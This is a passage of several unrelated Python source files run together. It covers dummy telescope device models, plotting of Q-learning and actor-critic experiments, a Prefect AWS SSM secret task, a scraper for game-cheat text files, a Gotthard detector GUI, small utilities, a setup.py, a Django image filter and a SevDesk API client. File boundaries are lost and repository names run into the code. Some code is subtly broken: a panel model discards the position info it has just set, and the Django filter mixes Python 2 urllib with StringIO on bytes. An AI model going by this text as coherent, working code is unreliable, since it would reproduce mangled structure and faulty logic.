sub_periods : (dict of str : int) Dictionary of node browse name : subscription period (ms) used to specify specific subscription periods for different data nodes. If not provided, the default subscription publish intervals will be used. """ subclasses = {subcls.TYPE_NODE_ID: subcls for subcls in DummyDeviceModel.__subclasses__()} type_node_id = obj_node.get_type_definition().to_string() if type_node_id in subclasses: model_class = subclasses[type_node_id] else: raise ValueError("Could not find DeviceModel type " "matching type_node_id: {}".format(type_node_id)) model = model_class(obj_node, opcua_client, *args, **kwargs) return model @property def data(self): """dict: Dictionary of data property names (str) and values.""" return self._data @property def errors(self): """dict: Dictionary of error property names (str) and values.""" return self._errors @property def methods(self): """list: List of method names.""" return self._methods @property def name(self): """str: Name of device.""" return self._name @property def id(self): """str: Unique device id.""" return self._id @property def type(self): """str: Name of this device's type.""" return self._type @property def position_info(self): """str: Name of this device's type.""" return self._position_info def set_data(self, name, value): self._data[name] = value def set_error(self, name, value): self._errors[name] = value # Calls an object method and returns its return value def call_method(self, method_name, *args): method_to_call = self._methods[method_name] return method_to_call(*args) def call_stop(self): self._stop() def _stop(self): pass def generate_dummy_data(self, type, name, mean=10.0, stddev=1.0, min_time=1.0, max_time=2.0): while True: if type == "data": type_dict = self._data elif type == "error": type_dict = self._errors else: raise ValueError("Invalid type {}".format(type)) if name in type_dict: type_dict[name] = random.gauss(mean, stddev) self._socketio_server.emit('data_change', { 'device_id': self.id, 'type': type, 'name': name, 'value': type_dict[name]}) logger.debug("Data change - {} : {} : {} : {}".format( self.id, type, name, type_dict[name])) time.sleep(random.uniform(min_time, max_time)) class DummyTelescopeModel(DummyDeviceModel): """Dummy model class for a telescope device.""" DEVICE_TYPE_NAME = "Telescope" def __init__(self, socketio_server=None): super().__init__(socketio_server=socketio_server) class DummyMirrorModel(DummyDeviceModel): """Dummy model class for a mirror device.""" DEVICE_TYPE_NAME = "Mirror" def __init__(self, socketio_server=None): super().__init__(socketio_server=socketio_server) class DummyPanelModel(DummyDeviceModel): """Dummy model class for a panel device.""" DEVICE_TYPE_NAME = "Panel" def __init__(self, panel_number, initial_data=None, socketio_server=None): super().__init__(socketio_server=socketio_server) logger.info("Creating dummy panel with ID {}".format(panel_number)) self.panel_number = panel_number if self.panel_number[0] == '1': self.mirror = 'primary' mirror_identifier = 'P' elif self.panel_number[0] == '2': self.mirror = 'secondary' mirror_identifier = 'S' self.ring_number = self.panel_number[2] if self.ring_number == '1': self.ring = 'inner' elif self.ring_number == '2': self.ring = 'outer' self.panel_type = mirror_identifier + self.ring_number self._position_info = { 'panel_number': self.panel_number, 'mirror': self.mirror, 'ring': self.ring, 'panel_type': self.panel_type } self._id = panel_number self._name = "Panel " + panel_number self._position_info = {} if initial_data: 
self._data = initial_data else: self._data = { 'State': 0, 'curCoords_x': -3.5, 'curCoords_y': 3.1, 'curCoords_z': 608.9, 'curCoords_xRot': -4.4, 'curCoords_yRot': -0.5, 'curCoords_zRot': 2.1, 'inCoords_x': -3.5, 'inCoords_y': 3.1, 'inCoords_z': 608.9, 'inCoords_xRot': -4.4, 'inCoords_yRot': -0.5, 'inCoords_zRot': 2.1, 'InternalTemperature': 20.84, 'ExternalTemperature': 34.81 } logger.info("Set initial data.") thread1 = threading.Thread(target=self.generate_dummy_data, args=("data", "InternalTemperature"), kwargs={'mean': 20.0}) thread1.daemon = True thread1.start() thread2 = threading.Thread(target=self.generate_dummy_data, args=("data", "ExternalTemperature"), kwargs={'mean': 34.0}) thread2.daemon = True thread2.start() logger.info("Started dummy data generation threads.") class DummyEdgeModel(DummyDeviceModel): """Dummy model class for an edge device.""" DEVICE_TYPE_NAME = "Edge" def __init__(self, socketio_server=None): super().__init__(socketio_server=socketio_server) class DummyActuatorModel(DummyDeviceModel): """Dummy model class for an ACT device.""" DEVICE_TYPE_NAME = "Actuator" def __init__(self, socketio_server=None): super().__init__(socketio_server=socketio_server) class DummyMPESModel(DummyDeviceModel): """Dummy model class for an MPES device.""" DEVICE_TYPE_NAME = "MPES" def __init__(self, socketio_server=None): super().__init__(socketio_server=socketio_server) class DummyGASSystemModel(DummyDeviceModel): """Dummy model class for the GAS system.""" DEVICE_TYPE_NAME = "GAS System" def __init__(self, socketio_server=None): super().__init__(socketio_server=socketio_server) class DummyPointingSystemModel(DummyDeviceModel): """Dummy model class for the telescope pointing system.""" DEVICE_TYPE_NAME = "Pointing System" def __init__(self, socketio_server=None): super().__init__(socketio_server=socketio_server) class DummyPositionerModel(DummyDeviceModel): """Dummy model class for the telescope positioner.""" DEVICE_TYPE_NAME = "Positioner" def __init__(self, socketio_server=None): super().__init__(socketio_server=socketio_server) # Set of node ids for type nodes corresponding to all implemented DeviceModel # subclasses plus folder type nodes. 
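# In this dummy module the mapping below is keyed by subclass name (e.g.
# "DummyPanelModel") rather than by OPC UA type node id, with the subclass itself
# as the value.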
DUMMY_DEVICE_MODEL_CLASSES = {subcls.__name__: subcls for subcls in DummyDeviceModel.__subclasses__()} costaware/utils/experiment_plotter.py import os import numpy as np import matplotlib.pyplot as plt from matplotlib.ticker import FuncFormatter import seaborn as sns from itertools import product sns.set_context("paper") sns.set_style("whitegrid") def load_experiment(directory, filename, r, c, dim, ql_cut=800000, ac_cut=500000): def load_condition(subdir): split = subdir.split('-') return split[0] == f"r{r}c{c}" and split[1] == f"{dim}x{dim}" experiment = next(subdir for subdir in os.listdir(directory) if load_condition(subdir)) q_learning = [] actor_critic = [] for exp_run in os.listdir(directory + "/" + experiment): ratios = np.load("/".join([directory, experiment, exp_run, f"{filename}.npy"])) actor = exp_run.split('-')[0] if actor == "LinearAC": actor_critic.append(ratios[:ac_cut]) elif actor == "TabularQ": q_learning.append(ratios[:ql_cut]) return np.array(q_learning), np.array(actor_critic) def title_generator(dim, r, c, agent): config = { "dimension": { 5: "Small", 10: "Medium", 20: "Large", }, "measure": { (2, 1): "Type-1", (3, 2): "Type-2", (4, 6): "Type-3", } } return " ".join([config["dimension"][dim], config["measure"][(r,c)], agent]) def sci_formatter(number, pos=None): string = f"{number:1.1e}" mantissa = string[:3] exponent = int(string[-2:]) return "$" + mantissa + "\\times 10^{" + str(exponent) + "}$" def percent_formatter(number, pos=None): return f"{number:0.1f}%" def plot_comparison_runs(fig, axes, q_learning, actor_critic, plot_runs=False, **kwargs): default_kwargs = { 'colors': ['r', 'b'], 'alpha': 0.15, 'linewidth': 0., } kwargs = {a: kwargs.get(a, b) for a, b in default_kwargs.items()} for i, dataset in enumerate([q_learning, actor_critic]): mean = dataset.mean(axis=0) std = dataset.std(axis=0) steps = np.arange(mean.size) if plot_runs: for run in dataset: axes[i].plot(steps, run, color='000000', alpha=0.2) axes[i].plot(steps, mean, color=kwargs['colors'][i]) axes[i].fill_between( steps, mean - std, mean + std, linewidth=kwargs['linewidth'], alpha=kwargs['alpha'], color=kwargs['colors'][i] ) axes[i].fill_between( steps, mean - 2 * std, mean + 2 * std, linewidth=kwargs['linewidth'], alpha=kwargs['alpha'], color=kwargs['colors'][i], ) return fig, axes def experiment1(): config = { "top directory" : "data/alg_comparisons", "filename" : "ratios", "reward-cost pairs" : [(2, 1), (3, 2), (4, 6)], "dimensions" : [10, 20], "cutoffs" : { "ql": [[100000, 800000, 500000], [60000, 3000000, 1000000]], "ac": [[100000, 400000, 500000], [250000, 200000, 100000]], }, "figsize" : (16, 12), "xlabel" : "Iterations", "ylabel" : "Ratio $\\rho$", } fig, axes = plt.subplots( 2 * len(config["dimensions"]), len(config["reward-cost pairs"]), figsize=config["figsize"], ) for d, dim in enumerate(config["dimensions"]): for i, (r, c) in enumerate(config["reward-cost pairs"]): ql_idx = (2*d, i) ac_idx = (2*d+1, i) axes[ql_idx].get_shared_y_axes().join(axes[ql_idx], axes[ac_idx]) q_learning, actor_critic = load_experiment( config["top directory"], config["filename"], r, c, dim, ac_cut=config["cutoffs"]['ac'][d][i], ql_cut=config["cutoffs"]['ql'][d][i] ) plot_comparison_runs( fig, [axes[ql_idx], axes[ac_idx]], q_learning, actor_critic, alpha=0., plot_runs=True,) for idx, label in zip([ql_idx, ac_idx], ["QL", "AC"]): axes[idx].set_title(title_generator(dim, r, c, label), fontsize=10) axes[idx].xaxis.set_major_formatter(FuncFormatter(sci_formatter)) axes[idx].yaxis.set_major_formatter(FuncFormatter( 
lambda number, pos=None: f"{number:1.1f}" )) axes[idx].set_ylabel(config["ylabel"]) axes[idx].set_xlabel(config["xlabel"]) plt.setp(axes[idx].xaxis.get_majorticklabels(), fontsize=8, rotation_mode="anchor", rotation=10, ha='right') sns.despine(ax=axes[idx]) plt.subplots_adjust(hspace=0.45) # for i in range(2): # axes[0,i].set_ylim(config["ylim"][i]) fig.savefig("plots/experiment1.jpg", bbox_inches="tight") def experiment2(): config = { "top directory" : "data/different_inits", "filename" : "ratios", "reward-cost pairs" : [(2, 1), (3, 2)], "dimensions" : [10], "cutoffs" : { "ql": [[40000, 800000]], "ac": [[120000, 120000]], }, "figsize" : (7, 5), "ylim" : [(0, 23), (0, 10)], "ylabel" : "Ratio $\\rho$", "xlabel" : "Iterations", } fig, axes = plt.subplots( 2 * len(config["dimensions"]), len(config["reward-cost pairs"]), figsize=config["figsize"], sharey='col', ) for d, dim in enumerate(config["dimensions"]): for i, (r, c) in enumerate(config["reward-cost pairs"]): ql_idx = (2*d, i) ac_idx = (2*d+1, i) q_learning, actor_critic = load_experiment( config["top directory"], config["filename"], r, c, dim, ac_cut=config["cutoffs"]['ac'][d][i], ql_cut=config["cutoffs"]['ql'][d][i] ) plot_comparison_runs( fig, [axes[ql_idx], axes[ac_idx]], q_learning, actor_critic, plot_runs=True, alpha=0. ) for idx, label in zip([ql_idx, ac_idx], ["QL", "AC"]): axes[idx].set_title(title_generator(dim, r, c, label), fontsize=10) axes[idx].xaxis.set_major_formatter(FuncFormatter(sci_formatter)) axes[idx].yaxis.set_major_formatter(FuncFormatter( lambda number, pos=None: f"{number:1.0f}" )) axes[idx].set_ylabel(config["ylabel"]) axes[idx].set_xlabel(config["xlabel"]) plt.setp(axes[idx].xaxis.get_majorticklabels(), fontsize=8, rotation_mode="anchor", rotation=10, ha='right') sns.despine(ax=axes[idx]) plt.subplots_adjust(hspace=0.45, wspace=0.2) for i, j in product(range(2), repeat=2): axes[i,i].set_ylim(config["ylim"][i]) fig.savefig("plots/experiment2.jpg", bbox_inches="tight") def experiment3(): config = { "top directory" : "data/mc_control", "filename" : "percent_time_in_goal", "reward-cost pairs" : [(4, 6)], "dimensions" : [5,10], "cutoffs" : { "ql": [[200000], [200000]], "ac": [[200000], [200000]], }, "figsize" : (7, 5), "ylim" : [(0, 40), (0, 20)], "ylabel" : "Percent spent in state $0$", "xlabel" : "Iterations", } fig, axes = plt.subplots( len(config["dimensions"]), 2, figsize=config["figsize"], sharey='col' ) for d, dim in enumerate(config["dimensions"]): for i, (r, c) in enumerate(config["reward-cost pairs"]): ql_idx = (i, d) ac_idx = (i+1, d) q_learning, actor_critic = load_experiment( config["top directory"], config["filename"], r, c, dim, ac_cut=config["cutoffs"]['ac'][d][i], ql_cut=config["cutoffs"]['ql'][d][i] ) plot_comparison_runs( fig, [axes[ql_idx], axes[ac_idx]], q_learning, actor_critic, plot_runs=True, alpha=0. 
) for idx, label in zip([ql_idx, ac_idx], ["QL", "AC"]): axes[idx].set_title(title_generator(dim, r, c, label), fontsize=10) axes[idx].xaxis.set_major_formatter(FuncFormatter(sci_formatter)) axes[idx].yaxis.set_major_formatter(FuncFormatter(percent_formatter)) axes[idx].set_ylabel(config["ylabel"]) axes[idx].set_xlabel(config["xlabel"]) plt.setp(axes[idx].xaxis.get_majorticklabels(), fontsize=8, rotation_mode="anchor", rotation=10, ha='right') sns.despine(ax=axes[idx]) plt.subplots_adjust(hspace=0.5, wspace=0.4) for i in range(2): axes[0,i].set_ylim(config["ylim"][i]) fig.savefig("plots/experiment3.jpg", bbox_inches="tight") experiment1() experiment2() experiment3() 1-10 from prefect.tasks.secrets.base import SecretBase from prefect.utilities.aws import get_boto_client from prefect.utilities.tasks import defaults_from_attrs class AWSParametersManager(SecretBase): """ Task for retrieving values from AWS SSM Parameters Store and returning the parameter value. Note that all initialization arguments can optionally be provided or overwritten at runtime. For authentication, there are two options: you can set the `AWS_CREDENTIALS` Prefect Secret containing your AWS access keys, which will be passed directly to the `boto3` client, or you can [configure your flow's runtime environment](https://boto3.amazonaws.com/v1/documentation/api/latest/guide/configuration.html#guide-configuration) for `boto3`. Args: - parameter_name (str, optional): The name of the parameter to retrieve via SSM. - boto_kwargs (dict, optional): Additional keyword arguments to forward to the boto client. - **kwargs (dict, optional): Additional keyword arguments to pass to the Task constructor. """ def __init__(self, parameter_name: str = None, boto_kwargs: dict = None, **kwargs): self.parameter_name = parameter_name if boto_kwargs is None: self.boto_kwargs = {} else: self.boto_kwargs = boto_kwargs super().__init__(**kwargs) @defaults_from_attrs("parameter_name", "boto_kwargs") def run( self, parameter_name: str = None, credentials: str = None, boto_kwargs: dict = None, ) -> str: """ Task run method. Args: - parameter_name (str): The name of the parameter to retrieve from SSM. - credentials (dict, optional): Your AWS credentials passed from an upstream Secret task; this Secret must be a JSON string with two keys: `ACCESS_KEY` and `SECRET_ACCESS_KEY` which will be passed directly to `boto3`. If not provided here or in context, `boto3` will fall back on standard AWS rules for authentication. - boto_kwargs (dict, optional): Additional keyword arguments to forward to the boto client. Returns: - str: The parameter value, as a string. """ if parameter_name is None: raise ValueError("A parameter name must be provided.") ssm_client = get_boto_client("ssm", credentials=credentials, **boto_kwargs) parameter_response = ssm_client.get_parameter(Name=parameter_name) parameter_value = str(parameter_response["Parameter"]["Value"]) return parameter_value scrape.py0 #!/usr/bin/env python from bs4 import BeautifulSoup; import os; import sys; import tarfile; import tempfile; import time; import urllib.request # Change to the scripts location. Helps with running it through CRON. 
abspath = os.path.abspath(__file__); dname = os.path.dirname(abspath); os.chdir(dname); # URLs to scrape urls = { 'Wii': { 'fileName': 'wii', 'url': 'https://www.geckocodes.org/index.php?chid=R&r=*&l=all' }, 'WiiWare': { 'fileName': 'wii_ware', 'url': 'https://www.geckocodes.org/index.php?chid=W&r=*&l=all' }, 'Virtual Console Arcade': { 'fileName': 'virtual_console_arcade', 'url': 'https://www.geckocodes.org/index.php?chid=D&r=*&l=all' }, 'Wii Channels': { 'fileName': 'wii_channels', 'url': 'https://www.geckocodes.org/index.php?chid=H&r=*&l=all' }, 'Gamecube': { 'fileName': 'gamecube', 'url': 'https://www.geckocodes.org/index.php?chid=G&r=*&l=all' }, 'NES / Famicom': { 'fileName': 'n_e_s_famicom', 'url': 'https://www.geckocodes.org/index.php?chid=F&r=*&l=all' }, 'Super NES/Famicom': { 'fileName': 'super_n_e_s_famicom', 'url': 'https://www.geckocodes.org/index.php?chid=J&r=*&l=all' }, 'Nintendo 64': { 'fileName': 'nintendo_64', 'url': 'https://www.geckocodes.org/index.php?chid=N&r=*&l=all' }, 'Sega Master System': { 'fileName': 'sega_master_system', 'url': 'https://www.geckocodes.org/index.php?chid=L&r=*&l=all' }, 'Genesis/Mega Drive': { 'fileName': 'genesis_mega_drive', 'url': 'https://www.geckocodes.org/index.php?chid=M&r=*&l=all' }, 'NeoGeo': { 'fileName': 'neo_geo', 'url': 'https://www.geckocodes.org/index.php?chid=E&r=*&l=all' }, 'Commodore 64': { 'fileName': 'commodore_64', 'url': 'https://www.geckocodes.org/index.php?chid=C&r=*&l=all' }, 'MSX': { 'fileName': 'msx', 'url': 'https://www.geckocodes.org/index.php?chid=X&r=*&l=all' }, 'TurboGraFX-16': { 'fileName': 'turbo_gra_f_x_16', 'url': 'https://www.geckocodes.org/index.php?chid=P&r=*&l=all' }, 'TurboGraFX-CD': { 'fileName': 'turbo_gra_f_x_c_d', 'url': 'https://www.geckocodes.org/index.php?chid=Q&r=*&l=all' }, }; txtDownloadUrl = "https://www.geckocodes.org/txt.php?txt="; for url in urls: # Connect to the URL response = urllib.request.urlopen(urls[url]['url']); # If one of the pages doesn't load up successfully, just kill the program if response.code != 200: sys.exit(1); # Parse HTML and save to BeautifulSoup object soup = BeautifulSoup(response, "html.parser"); # Create a temporary directory tempDirectory = tempfile.TemporaryDirectory(); # Iterate through each of the games listed for link in soup.find("div", class_="list").findAll("a"): # Grab just the hyperlink, since thats all we are interested in cheatLink = link.get('href'); # Chop off the index.php part titleId = cheatLink.replace("./index.php?c=", ""); # Finally save the resulting text file response = urllib.request.urlretrieve(txtDownloadUrl + titleId, tempDirectory.name + "/" + titleId + ".txt"); # Put all of the newly downloaded files in to a tar.gz archive file tar = tarfile.open(urls[url]['fileName'] + ".tar.gz", "w:gz"); for name in os.listdir(tempDirectory.name): tar.add(tempDirectory.name + "/" + name, arcname=name); tar.close(); # Close the temp directory to clean up the files tempDirectory.cleanup(); # Just assume everything finished successfully and exit sys.exit(0); extra_foam/special_suite/gotthard_w.py """ Distributed under the terms of the BSD 3-Clause License. The full license is in the file LICENSE, distributed with this software. Author: <> Copyright (C) European X-Ray Free-Electron Laser Facility GmbH. All rights reserved. 
""" from string import Template import numpy as np from PyQt5.QtCore import Qt from PyQt5.QtGui import QDoubleValidator, QIntValidator from PyQt5.QtWidgets import QCheckBox, QSplitter from extra_foam.gui.ctrl_widgets.smart_widgets import ( SmartBoundaryLineEdit, SmartLineEdit, SmartSliceLineEdit, SmartStringLineEdit ) from extra_foam.gui.misc_widgets import FColor from extra_foam.gui.plot_widgets import ( HistMixin, ImageViewF, PlotWidgetF ) from .config import _MAX_N_GOTTHARD_PULSES, GOTTHARD_DEVICE from .gotthard_proc import ( GotthardProcessor, _DEFAULT_BIN_RANGE, _DEFAULT_N_BINS ) from .special_analysis_base import ( create_special, ClientType, _BaseAnalysisCtrlWidgetS, _SpecialAnalysisBase ) _MAX_N_BINS = 999 class GotthardCtrlWidget(_BaseAnalysisCtrlWidgetS): """Gotthard analysis control widget.""" def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self.output_ch_le = SmartStringLineEdit( GOTTHARD_DEVICE.get(self.topic, "Gotthard:output")) self.ma_window_le = SmartLineEdit("1") validator = QIntValidator() validator.setBottom(1) self.ma_window_le.setValidator(validator) self.pulse_slicer_le = SmartSliceLineEdit(":") self.poi_index_le = SmartLineEdit("0") self.poi_index_le.setValidator( QIntValidator(0, _MAX_N_GOTTHARD_PULSES - 1)) self.bin_range_le = SmartBoundaryLineEdit(_DEFAULT_BIN_RANGE) self.n_bins_le = SmartLineEdit(str(_DEFAULT_N_BINS)) self.n_bins_le.setValidator(QIntValidator(1, _MAX_N_BINS)) self.hist_over_ma_cb = QCheckBox("Histogram over M.A. train") self.scale_le = SmartLineEdit("0") validator = QDoubleValidator() validator.setBottom(0) self.scale_le.setValidator(validator) self.offset_le = SmartLineEdit("0") self.offset_le.setValidator(QDoubleValidator()) self._non_reconfigurable_widgets = [ self.output_ch_le ] self.initUI() self.initConnections() def initUI(self): """Override.""" layout = self.layout() layout.addRow("Output channel: ", self.output_ch_le) layout.addRow("M.A. window: ", self.ma_window_le) layout.addRow("Pulse slicer: ", self.pulse_slicer_le) layout.addRow("P.O.I. (sliced): ", self.poi_index_le) layout.addRow("Bin range: ", self.bin_range_le) layout.addRow("# of bins: ", self.n_bins_le) layout.addRow("Scale (eV/pixel): ", self.scale_le) layout.addRow("Offset (eV): ", self.offset_le) layout.addRow("", self.hist_over_ma_cb) def initConnections(self): """Override.""" pass class GotthardAvgPlot(PlotWidgetF): """GotthardAvgPlot class. Visualize signals of the averaged pulse over a train as well as its moving average. """ def __init__(self, *, parent=None): super().__init__(parent=parent) self.setLabel('left', "ADU") self.setLabel('bottom', "Pixel") self.addLegend(offset=(5, 10)) self.setTitle("Averaged spectra over pulses") self._mean = self.plotCurve(name="Current", pen=FColor.mkPen("p")) self._mean_ma = self.plotCurve(name="Moving average", pen=FColor.mkPen("g")) def updateF(self, data): """Override.""" spectrum = data['spectrum_mean'] spectrum_ma = data['spectrum_ma_mean'] x = data["x"] if x is None: self.setLabel('bottom', "Pixel") x = np.arange(len(spectrum)) else: self.setLabel('bottom', "eV") self._mean.setData(x, spectrum) self._mean_ma.setData(x, spectrum_ma) class GotthardPulsePlot(PlotWidgetF): """GotthardPulsePlot class. Visualize signals of a single pulse as well as its moving average. 
""" def __init__(self, *, parent=None): super().__init__(parent=parent) self._idx = 0 self._updateTitle() self.setLabel('left', "ADU") self.setLabel('bottom', "Pixel") self.addLegend(offset=(5, 10)) self._poi = self.plotCurve(name="Current", pen=FColor.mkPen("p")) self._poi_ma = self.plotCurve(name="Moving average", pen=FColor.mkPen("g")) def _updateTitle(self): self.setTitle(f"Pulse of interest: {self._idx}") def updateF(self, data): """Override.""" idx = data['poi_index'] if idx != self._idx: self._idx = idx self._updateTitle() spectrum = data['spectrum'][idx] spectrum_ma = data['spectrum_ma'][idx] x = data["x"] if x is None: self.setLabel('bottom', "Pixel") x = np.arange(len(spectrum)) else: self.setLabel('bottom', "eV") self._poi.setData(x, spectrum) self._poi_ma.setData(x, spectrum_ma) class GotthardImageView(ImageViewF): """GotthardImageView class. Visualize the heatmap of pulse-resolved Gotthard data in a train. """ def __init__(self, *, parent=None): super().__init__(has_roi=True, roi_size=(100, 10), parent=parent) self.setAspectLocked(False) self.setTitle('ADU heatmap') self.setLabel('left', "Pulse index (sliced)") self.setLabel('bottom', "Pixel") def updateF(self, data): """Override.""" self.setImage(data['spectrum']) class GotthardHist(HistMixin, PlotWidgetF): """GotthardHist class Visualize the ADU histogram in a train. """ def __init__(self, *, parent=None): super().__init__(parent=parent) self._plot = self.plotBar() self._title_template = Template( f"mean: $mean, median: $median, std: $std") self.updateTitle() self.setLabel('left', 'Occurence') self.setLabel('bottom', 'ADU') def updateF(self, data): """Override.""" hist, bin_centers, mean, median, std = data['hist'] if bin_centers is None: self.reset() else: self._plot.setData(bin_centers, hist) self.updateTitle(mean, median, std) @create_special(GotthardCtrlWidget, GotthardProcessor) class GotthardWindow(_SpecialAnalysisBase): """Main GUI for Gotthard analysis.""" icon = "Gotthard.png" _title = "Gotthard" _long_title = "Gotthard analysis" _client_support = ClientType.KARABO_BRIDGE def __init__(self, topic): super().__init__(topic) self._poi_plots = GotthardPulsePlot(parent=self) self._mean_plots = GotthardAvgPlot(parent=self) self._heatmap = GotthardImageView(parent=self) self._hist = GotthardHist(parent=self) self.initUI() self.initConnections() self.startWorker() def initUI(self): """Override.""" middle_panel = QSplitter(Qt.Vertical) middle_panel.addWidget(self._poi_plots) middle_panel.addWidget(self._mean_plots) right_panel = QSplitter(Qt.Vertical) right_panel.addWidget(self._hist) right_panel.addWidget(self._heatmap) right_panel.setSizes([int(self._TOTAL_H / 2), int(self._TOTAL_H / 2)]) cw = self.centralWidget() cw.addWidget(middle_panel) cw.addWidget(right_panel) cw.setSizes([int(self._TOTAL_W / 3), int(self._TOTAL_W / 3), int(self._TOTAL_W / 3)]) self.resize(self._TOTAL_W, self._TOTAL_H) def initConnections(self): """Override.""" self._ctrl_widget_st.output_ch_le.value_changed_sgn.connect( self._worker_st.onOutputChannelChanged) self._ctrl_widget_st.output_ch_le.returnPressed.emit() self._ctrl_widget_st.poi_index_le.value_changed_sgn.connect( lambda x: self._worker_st.onPoiIndexChanged(int(x))) self._ctrl_widget_st.poi_index_le.returnPressed.emit() self._ctrl_widget_st.pulse_slicer_le.value_changed_sgn.connect( self._worker_st.onPulseSlicerChanged) self._ctrl_widget_st.pulse_slicer_le.returnPressed.emit() self._ctrl_widget_st.ma_window_le.value_changed_sgn.connect( self._worker_st.onMaWindowChanged) 
self._ctrl_widget_st.ma_window_le.returnPressed.emit() self._ctrl_widget_st.scale_le.value_changed_sgn.connect( self._worker_st.onScaleChanged) self._ctrl_widget_st.scale_le.returnPressed.emit() self._ctrl_widget_st.offset_le.value_changed_sgn.connect( self._worker_st.onOffsetChanged) self._ctrl_widget_st.offset_le.returnPressed.emit() self._ctrl_widget_st.bin_range_le.value_changed_sgn.connect( self._worker_st.onBinRangeChanged) self._ctrl_widget_st.bin_range_le.returnPressed.emit() self._ctrl_widget_st.n_bins_le.value_changed_sgn.connect( self._worker_st.onNoBinsChanged) self._ctrl_widget_st.n_bins_le.returnPressed.emit() self._ctrl_widget_st.hist_over_ma_cb.toggled.connect( self._worker_st.onHistOverMaChanged) self._ctrl_widget_st.hist_over_ma_cb.toggled.emit( self._ctrl_widget_st.hist_over_ma_cb.isChecked()) python/testData/intentions/typeInDocstring4.py class ProjectElement(object): def __init__(self, project_name='', info_source='', project_id=None, has_revisions=True):mcanitexgen/animation/utils.py import math import os from pathlib import Path from typing import Generator, Iterable def round_half_away_from_zero(num) -> int: """ y = sign(x) * floor(|x|+0.5) """ return int(math.copysign(math.floor(abs(num) + 0.5), num)) def partition_by_weights( number: int, total_weight: int, weights: Iterable[int] ) -> Generator[int, None, None]: """ Partitions a number into a series of integers proportianal to a series of weights """ remaining = number remaining_weight = total_weight for weight in weights: weighted_amount = int( round_half_away_from_zero((weight * remaining) / remaining_weight) ) remaining -= weighted_amount remaining_weight -= weight if remaining_weight < 0: raise ValueError(f"Weights exceed passed total weight of '{total_weight}'") yield weighted_amount class DurationDistributor: def __init__(self, num: int, total_weight: int): self.num = num self.total_weight = total_weight self.remaining = num self.remaining_weight = total_weight def take(self, weight: int): if self.is_empty(): raise Exception("Trying to take from empty Distributor") weighted_amount = int( round_half_away_from_zero((weight * self.remaining) / self.remaining_weight) ) self.remaining -= weighted_amount self.remaining_weight -= weight if self.remaining_weight < 0: raise ValueError(f"Weights exceed passed total weight of '{self.total_weight}'") return weighted_amount def is_empty(self): return self.remaining <= 0 def files_in_dir(dir: Path): for dirname, _, filenames in os.walk(dir): for filename in filenames: yield Path(dirname, filename) #coding:utf-8 from logging import getLogger from os import cpu_count log = getLogger() def n_processes(n): cores = cpu_count() if n > cores: log.warning("Warning: more processes requested ({proc}) than " "cores available ({cores}); using {cores} instead".format(proc=n, cores=cores)) procs = cores elif n < 0: procs = cores + 1 + n if procs < 0: log.warning("{n} fewer than available cores requested, but only {cores} cores " "are available; using 1 process instead".format(n=n+1, cores=cores)) procs = 1 elif isinstance(n, int) and n > 0: procs = n else: raise ValueError("Number of requested processes must be an int, greater than or less than 0") return procs hyjalxl/spidier2handle_image/handle.py # coding=utf-8 # name=hu_yang_jie #coding=utf-8 import cv2 import numpy as np img = cv2.imread("bili.jpg") #载入图像 h, w = img.shape[:2] #获取图像的高和宽 cv2.imshow("Origin", img) #显示原始图像 blured = cv2.blur(img,(5,5)) #进行滤波去掉噪声 cv2.imshow("Blur", blured) #显示低通滤波后的图像 mask = np.zeros((h+2, w+2), 
np.uint8) #掩码长和宽都比输入图像多两个像素点,满水填充不会超出掩码的非零边缘 #进行泛洪填充 cv2.floodFill(blured, mask, (w-1,h-1), (255,255,255), (2,2,2),(3,3,3),8) cv2.imshow("floodfill", blured) #得到灰度图 gray = cv2.cvtColor(blured,cv2.COLOR_BGR2GRAY) cv2.imshow("gray", gray) #定义结构元素 kernel = cv2.getStructuringElement(cv2.MORPH_RECT,(50, 50)) #开闭运算,先开运算去除背景噪声,再继续闭运算填充目标内的孔洞 opened = cv2.morphologyEx(gray, cv2.MORPH_OPEN, kernel) closed = cv2.morphologyEx(opened, cv2.MORPH_CLOSE, kernel) cv2.imshow("closed", closed) #求二值图 ret, binary = cv2.threshold(closed,250,255,cv2.THRESH_BINARY) cv2.imshow("binary", binary) #找到轮廓 _,contours, hierarchy = cv2.findContours(binary,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE) #绘制轮廓 cv2.drawContours(img,contours,-1,(0,0,255),3) #绘制结果 cv2.imshow("result", img) cv2.waitKey(0) cv2.destroyAllWindows()grantperry/majortom_gateway_packagesetup.py import setuptools VERSION = "0.0.7" with open("README.md", "r") as readme: readme_content = readme.read() setuptools.setup( name="majortom_gateway", version=VERSION, author="Kubos", author_email="", description="A package for interacting with Major Tom's Gateway API.", long_description=readme_content, long_description_content_type="text/markdown", url="https://github.com/kubos/majortom_gateway_package", packages=setuptools.find_packages(exclude=["*.tests", "*.tests.*", "tests.*", "tests"]), classifiers=[ "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.6", "Programming Language :: Python :: 3 :: Only", "Topic :: Software Development :: Libraries :: Python Modules", "Intended Audience :: Developers", "License :: OSI Approved :: Apache Software License", "Operating System :: OS Independent" ], python_requires='>=3.6', keywords='majortom major_tom gateway kubos major tom satellite', install_requires=[ "websockets", "requests" ] ) import base64 import io import urllib from django import template register = template.Library() @register.filter def get64(url): """ Method returning base64 image data instead of URL """ if url.startswith("http"): image = io.StringIO(urllib.urlopen(url).read()) return 'data:image/jpg;base64,' + base64.b64encode(image.read()) return url from __future__ import annotations from collections import UserDict, namedtuple from enum import Enum from typing import Dict, Union import attrs import cattrs import requests from .. 
import UNSET, Client, Unset from .borg import Borg ApiObjectTypeHelper = namedtuple("ApiObjectType", ["url", "object_type", "key"]) class ApiObjectType(Enum): """ API-Objects available trough the SevDesk API The Enum-Type contains specific helpers to access the SevDesk API (url-fragment, object-type, sort key) """ COUNTRY = ApiObjectTypeHelper("StaticCountry", UNSET, "code") ADDRESS_CATEGORIES = ApiObjectTypeHelper( "Category", "ContactAddress", "translationCode" ) COMMUNICATION_WAY_KEY = ApiObjectTypeHelper( "CommunicationWayKey", UNSET, "translationCode" ) UNITY = ApiObjectTypeHelper("Unity", UNSET, "translationCode") @attrs.define() class ApiObject: """ A SevDesk API-Object """ id: str objectName: str name: str translationCode: str code: Union[Unset, str] = UNSET @staticmethod def from_dict(item: Dict) -> ApiObject: return cattrs.structure(item, ApiObject) class ApiObjects(UserDict): def __init__(self, client: Client, api_type: ApiObjectType) -> None: super().__init__() url = f"{client.base_url}/{api_type.value.url}" params = {"limit": 1000} if api_type.value.object_type: params.update({"objectType": api_type.value.object_type}) request = requests.get(url=url, 